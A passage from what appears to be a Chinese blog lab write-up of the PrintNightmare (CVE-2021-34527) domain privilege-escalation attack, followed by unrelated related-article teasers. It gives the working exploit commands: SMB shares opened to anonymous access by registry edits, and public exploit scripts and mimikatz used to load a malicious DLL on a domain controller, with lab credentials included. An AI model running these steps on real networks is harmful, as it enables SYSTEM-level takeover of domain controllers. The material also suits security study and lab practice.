CVE-2021-34527: PrintNightmare 域内提权

embedded/2025/2/26 4:44:05/
  • 域控 ip:192.168.72.21,hostname:dc01

  • 域内攻击者机器 ip:192.168.72.158,hostname:WIN10-01

  • 攻击者 kali 机器 ip:192.168.72.162

如果目标机器开启 Print Spooler 服务,那么此漏洞允许攻击者将代码注入到 Print Spooler 服务的进程 spoolsv.exe 中,以 system 权限执行。

漏洞实验

检测是否开放MS-RPRN服务
python3 rpcdump.py @192.168.72.163 | grep MS-RPRN
linux创建smb服务

目的是为了让目标访问到Evil.dll

修改SMB配置文件/etc/samba/smb.conf:
[global]
map to guest = Bad User
server role = standalone server
user share allow guests = yes
idmap config* : backend=tdb
smb ports=445
​
[smb]
comment=Samba 
path=/tmp/
guest ok=yes
read only=no
browsable=yes

启动smb服务

#启动smb服务
service smbd start
service smbd status
windows创建smb服务
mkdir C:\share\
icacls C:\share\ /T /grant "ANONYMOUS LOGON":r
icacls C:\share\ /T /grant Everyone:r
powershell.exe New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
CVE-2021-1675.py 脚本攻击
python CVE-2021-1675.py HACK.com/administrator:p-0p-0p-0@192.168.72.21 \\192.168.72.158\share\demon.dll
​
python printnightmare.py -dll \\192.168.72.158\share\demon.dll administrator:p-0p-0p-0@192.168.72.21

这里可以看到我的环境下虽然能上传 dll,但是加载不了。

 

mimikatz攻击
mimikatz.exe "misc::printnightmare /server:192.168.72.163 /library:\\192.168.72.158\share\demon.x64.dll"
mimikatz.exe "misc::printnightmare /server:10.211.55.14 /library:\\10.211.55.7\share\1.dll"

http://www.ppmy.cn/embedded/167196.html

相关文章

AI赋能市场预测:ScriptEcho如何提升数据可视化效率

在瞬息万变的商业世界中,准确预测市场趋势对于企业的生存和发展至关重要。及早洞察市场变化,能够帮助企业制定更有效的战略,抢占先机,获得竞争优势。而AI代码生成器,特别是像ScriptEcho这样的AI前端开发工具&#xff0…

给SQL server数据库表字段添加注释SQL,附修改、删除注释SQL及演示

目录 一. 前提小知识(数据库连接,数据库,SCHEMA,Table的关系) 二. 添加备注 2.1 添加备注基本语法(sys.sp_addextendedproperty) 2.2 SQL演示 2.3?fn_listextendedproperty函数查询备注个数 2.4 开发常用添加注释语法 三. 修改备注 …

单片机 Bootloade与二进制文件的生成

单片机的 Bootloader 是一种特殊的程序,负责在单片机上电后初始化硬件、更新用户应用程序(固件),并将控制权移交给用户程序。以下是其运行机制和关键流程的详细说明: 1、单片机 Bootloader 的核心作用 固件更新&…

【Python爬虫(37)】解锁分布式爬虫:原理与架构全解析

【Python爬虫】专栏简介:本专栏是 Python 爬虫领域的集大成之作,共 100 章节。从 Python 基础语法、爬虫入门知识讲起,深入探讨反爬虫、多线程、分布式等进阶技术。以大量实例为支撑,覆盖网页、图片、音频等各类数据爬取&#xff…

Docker 与 CI/CD:自动化构建和部署

在现代软件开发中,CI/CD(持续集成/持续部署) 是一种高效的软件开发和运维方法。CI/CD 通过自动化构建、测试和部署流程,减少了人为错误,提高了软件交付的速度和质量。Docker,作为一种容器化平台&#xff0c…

设计模式-创建型模式

创建型模式组成 创建型设计模式关注的是对象的创建过程,旨在将对象的创建与使用分离,从而提高程序的灵活性和可复用性。以下是几种常见的创建型设计模式: 1. 单例模式(Singleton) 目的:确保一个类只有一…

Linux之文件系统

1.前言 文件 内容属性 文件分为被打开的文件(跟基础IO有关,在内存上)和没有被打开的文件(在磁盘上)。 在磁盘上找没有被打开的文件属于文件系统的工作 2.对硬件的理解 2.1 磁盘,服务器,机柜,机房 1.磁…

sqli-labs-master第46关

目录 报错注入 直接注入 数据库名 数据库中的表名 users表结构: users表数据: python脚本注入 直接注入 获取数据库名 获取表名 获取表结构 获取数据 布尔盲注 获取数据库名 获取表名 获取表结构 获取数据 报错注入 直接注入 数据库名…